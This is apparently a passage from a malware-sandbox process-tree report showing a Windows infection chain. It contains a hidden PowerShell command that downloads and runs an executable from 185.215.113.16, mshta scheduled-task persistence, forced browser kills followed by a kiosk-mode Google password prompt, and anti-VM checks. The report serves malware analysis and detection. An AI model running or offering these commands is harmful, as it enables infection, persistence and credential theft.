        
        schtasks /create /tn "wgaIbmaqLYl" /tr "mshta \"C:\Temp\PnGBFVtTh.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5024
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\PnGBFVtTh.hta"
        5⤵
        
        PID:5292
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        
        PID:3716
- - C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
    3⤵
    PID:2680
- - C:\Users\Admin\AppData\Local\Temp\1090389001\64d5d59e89.exe
    "C:\Users\Admin\AppData\Local\Temp\1090389001\64d5d59e89.exe"
    3⤵
    PID:5880
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:6476
- - C:\Users\Admin\AppData\Local\Temp\1090390001\ac4b36e192.exe
    "C:\Users\Admin\AppData\Local\Temp\1090390001\ac4b36e192.exe"
    3⤵
    PID:6544
- - C:\Users\Admin\AppData\Local\Temp\1090391001\ad08172486.exe
    "C:\Users\Admin\AppData\Local\Temp\1090391001\ad08172486.exe"
    3⤵
    PID:6776
- - C:\Users\Admin\AppData\Local\Temp\1090392001\11f98c9086.exe
    "C:\Users\Admin\AppData\Local\Temp\1090392001\11f98c9086.exe"
    3⤵
    PID:6280
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:2096
- - C:\Users\Admin\AppData\Local\Temp\1090393001\13b39b0e9e.exe
    "C:\Users\Admin\AppData\Local\Temp\1090393001\13b39b0e9e.exe"
    3⤵
    PID:6504
- - C:\Users\Admin\AppData\Local\Temp\1090394001\921cc429c2.exe
    "C:\Users\Admin\AppData\Local\Temp\1090394001\921cc429c2.exe"
    3⤵
    PID:4768
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:580
- - C:\Users\Admin\AppData\Local\Temp\1090395001\e5d2a7beeb.exe
    "C:\Users\Admin\AppData\Local\Temp\1090395001\e5d2a7beeb.exe"
    3⤵
    PID:2996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 1588
      4⤵
      Program crash
      PID:988
- - C:\Users\Admin\AppData\Local\Temp\1090396001\45ec9399f2.exe
    "C:\Users\Admin\AppData\Local\Temp\1090396001\45ec9399f2.exe"
    3⤵
    PID:4216
- - C:\Users\Admin\AppData\Local\Temp\1090397001\da09846f87.exe
    "C:\Users\Admin\AppData\Local\Temp\1090397001\da09846f87.exe"
    3⤵
    PID:3336
- - C:\Users\Admin\AppData\Local\Temp\1090398001\f657c83133.exe
    "C:\Users\Admin\AppData\Local\Temp\1090398001\f657c83133.exe"
    3⤵
    PID:6000
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:6268
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:4176
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:7024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:5668
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:2912
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:6816
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:6828
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 27211 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e0ed19d-c18b-40c1-a00e-e2d580e982c8} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" gpu
        6⤵
        
        PID:5940
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2388 -parentBuildID 20240401114208 -prefsHandle 2380 -prefMapHandle 2376 -prefsLen 28131 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1aaeb207-f430-4f83-89fd-06be87725b7f} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" socket
        6⤵
        
        PID:1236
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3208 -prefMapHandle 3128 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b413514-9c55-474c-be13-367ced539a43} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" tab
        6⤵
        
        PID:352
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 3436 -prefMapHandle 3432 -prefsLen 32621 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {808df6d6-10ff-40e0-a574-172f01fa7e86} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" tab
        6⤵
        
        PID:6792
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4200 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4240 -prefMapHandle 4236 -prefsLen 32621 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99dac33d-8852-4374-a222-b5c6e22cb227} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" utility
        6⤵
        
        PID:1912
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 3 -isForBrowser -prefsHandle 5464 -prefMapHandle 5460 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f3a72a9-b98a-4e99-8189-edc0c1090f44} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" tab
        6⤵
        
        PID:5024
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5604 -prefMapHandle 5608 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b0eb39a-715d-4b90-be22-45641a0d10ae} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" tab
        6⤵
        
        PID:3152
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5884 -childID 5 -isForBrowser -prefsHandle 5804 -prefMapHandle 5812 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29cb4f93-26de-4e6f-a3e3-8a1548c92f88} 6828 "\\.\pipe\gecko-crash-server-pipe.6828" tab
        6⤵
        
        PID:3092
- - C:\Users\Admin\AppData\Local\Temp\1090399001\2a411411ac.exe
    "C:\Users\Admin\AppData\Local\Temp\1090399001\2a411411ac.exe"
    3⤵
    PID:7136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn UoyJTmaYAxd /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlpl3JRor.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:5876
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn UoyJTmaYAxd /tr "mshta C:\Users\Admin\AppData\Local\Temp\zlpl3JRor.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2716
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\zlpl3JRor.hta
      4⤵
      PID:5624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LURMVWLZKDEFUTWVXQOSHTJVQHDJTZFA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1044
      - C:\Users\Admin\AppData\Local\TempLURMVWLZKDEFUTWVXQOSHTJVQHDJTZFA.EXE
        
        "C:\Users\Admin\AppData\Local\TempLURMVWLZKDEFUTWVXQOSHTJVQHDJTZFA.EXE"
        6⤵
        
        PID:5620
- - C:\Users\Admin\AppData\Local\Temp\1090400001\ce46664c19.exe
    "C:\Users\Admin\AppData\Local\Temp\1090400001\ce46664c19.exe"
    3⤵
    PID:2716
- - C:\Users\Admin\AppData\Local\Temp\1090401001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090401001\7nSTXG6.exe"
    3⤵
    PID:6176

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3912 -ip 3912
1⤵
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516
1⤵
PID:1744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa3cc40,0x7ff9cfa3cc4c,0x7ff9cfa3cc58
  2⤵
  PID:4908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1788 /prefetch:2
  2⤵
  PID:1688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1400,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  PID:4492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2120 /prefetch:8
  2⤵
  PID:244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:2996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3068,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3564,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:1
  2⤵
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3756,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:8
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4728 /prefetch:8
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:2004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8
  2⤵
  PID:4760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5168,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4880 /prefetch:8
  2⤵
  PID:5316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:5428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3736,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:5404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4704,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:5812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3368,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4380 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5432,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5564,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  PID:6060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5568,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5672 /prefetch:8
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5708,i,13318917319757746962,16139560029436488281,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=212 /prefetch:8
  2⤵
  PID:4888

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3872

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5316 -ip 5316
1⤵
PID:5592

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5128

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004E8
1⤵
PID:5456

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa9cc40,0x7ff9cfa9cc4c,0x7ff9cfa9cc58
  2⤵
  PID:2072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:3016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9cfa9cc40,0x7ff9cfa9cc4c,0x7ff9cfa9cc58
  2⤵
  PID:5984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1820 /prefetch:2
  2⤵
  PID:5716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  PID:5312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1744 /prefetch:8
  2⤵
  PID:5176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:5856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4440,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4392 /prefetch:8
  2⤵
  PID:5668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4600,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:1972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3868,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3588 /prefetch:8
  2⤵
  PID:5412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4772,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5060,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:2716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5360,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  PID:1516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5284,i,1699654065448971574,170599060739728302,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5364 /prefetch:8
  2⤵
  PID:6356
- C:\Program Files\Google\Chrome\Application\chrome.exe
